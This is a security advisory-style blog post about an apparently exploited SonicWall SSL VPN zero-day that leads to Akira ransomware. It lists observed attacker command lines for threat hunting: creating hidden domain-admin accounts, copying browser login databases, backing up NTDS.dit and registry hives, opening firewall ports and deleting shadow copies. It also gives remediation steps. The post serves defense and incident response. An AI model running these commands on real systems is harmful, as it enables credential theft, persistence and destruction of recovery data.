SonicWall VPN Zero-Day Exploited: Attackers Bypass MFA and Deploy Ransomware

A critical zero-day in SonicWall SSL VPNs is enabling rapid domain-wide ransomware attacks—even against networks with MFA. Here’s what’s happening, how attackers operate, and what urgent steps you should take.

Saiprashanth Pulisetti

8/5/20252 min read

The Threat: Fast, Sophisticated, Ongoing

Security teams, including Huntress, are witnessing a wave of intrusions leveraging a likely SonicWall zero-day. Attackers are reliably bypassing MFA and, within hours, moving laterally to compromise domain controllers and launch ransomware. These attacks are targeting SonicWall TZ and NSa-series appliances with SSLVPN enabled and running firmware versions 7.2.0-7015 or earlier

The Attack Chain: From Appliance Breach to Ransomware

After exploiting the SonicWall device—even with MFA—the attackers:

  • Abuse over-privileged accounts (e.g., sonicwall, LDAPAdmin)

  • Deploy backdoors like Cloudflared tunnels, OpenSSH, and remote management tools (AnyDesk, ScreenConnect)

  • Move laterally through PowerShell Remoting, WMI, and tooling

  • Steal credentials—dumping Veeam, Active Directory data

  • Disable defenses—turning off Windows Defender, firewall, and erasing recovery backups

  • Deploy ransomware (Akira), causing enterprise-wide disruption

Real-World Commands: What Attackers Are Running

Here’s a selection of the tools, tactics, and actual command lines observed in these attacks. Security teams should search endpoints and logs for these patterns:

Enumeration and Reconnaissance

"C:\Users\[redacted]\Downloads\Advanced_IP_Scanner_2.5.4594.1.exe"
"C:\[redacted]\netscan\netscan.exe"
"C:\Windows\system32\nltest.exe" /trusted_domains
"C:\Windows\system32\PING.EXE" 192.168.xx.xxx
"C:\Windows\system32\nltest.exe" /dclist:
"C:\Users\[redacted]\Documents\Advanced_Port_Scanner_2.5.3869.exe"
Install-WindowsFeature RSAT-AD-PowerShell
Get-ADComputer -Filter -Property | Select-Object Enabled, DNSHostName, IPv4Address, OperatingSystem, Description > C:\programdata\[redacted].txt
cmd.exe /Q /c nltest /domain_trusts 1> \\Windows\\Temp\\ysKBfL 2>&1
cmd.exe /Q /c quser 1> \\127.0.0.1\ADMIN$\__1754125023.3698354 2>&1
net group "Domain admins" /domain

Staging, Exfiltration, and Tool Usage
"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . X:\[Redacted]
C:\ProgramData\shares.txt
"C:\Program Files\FileZilla FTP Client\fzsftp.exe" -v

Persistence and Privilege Escalation

"C:\Windows\System32\msiexec.exe" /i "C:\ProgramData\OpenSSHa.msi"
"C:\Windows\system32\net.exe" user lockadmin Msnc?42da /add
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v commuser /d 0 /f
net user [REDACTED] VRT83g$%ce /add
net localgroup Administrators [redacted] /add
net localgroup "Remote Desktop Users" [redacted] /add
net group "Domain Admins" azuresync /add
cmd.exe /Q /c net user backupSQL Password123$ /add /dom 1> \\Windows\\Temp\\tinhLg 2>&1
cmd.exe /Q /c net group "Domain Admins" backupSQL /dom /add 1> \Windows\Temp\NDqyOI 2>&1

Credential Theft and Lateral Movement

cmd.exe /Q /c copy "C:\Users\[redacted]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1753954887.8450267"
"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SECURITY -quiet

Evasion and Security Disabling

"C:\Windows\system32\SystemSettingsAdminFlows.exe" Defender DisableEnhancedNotifications 1
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22

Recovery Prevention and Ransomware Execution

"C:\WINDOWS\system32\vssadmin.exe" delete shadows /all /quiet
w.exe -p=\\[redacted]\C$ -n=1

What You Should Do Right Now

  • Disable SonicWall SSL VPN immediately if possible

  • If you can’t, restrict access by IP allow-list and segment critical systems

  • Audit service accounts—especially those used by SonicWall devices; remove excessive privileges

  • Hunt for these command lines and processes in your logs, EDR, and SIEM tools

  • Review for attacker-created accounts like lockadmin, backupSQL, and suspicious new administrative groups

See the full technical write-up and complete investigation here:
https://www.huntress.com/blog/exploitation-of-sonicwall-vpn?utm_source=linkedin&utm_medium=social&utm_campaign=cy25-08-rr-multi-global-broad-all-sonicwall_vpn

Stay vigilant. Time is of the essence when these attacks land—and every minute counts.

For all details, IOCs, and updated incident response techniques, see: Active Exploitation of SonicWall VPNs | Huntress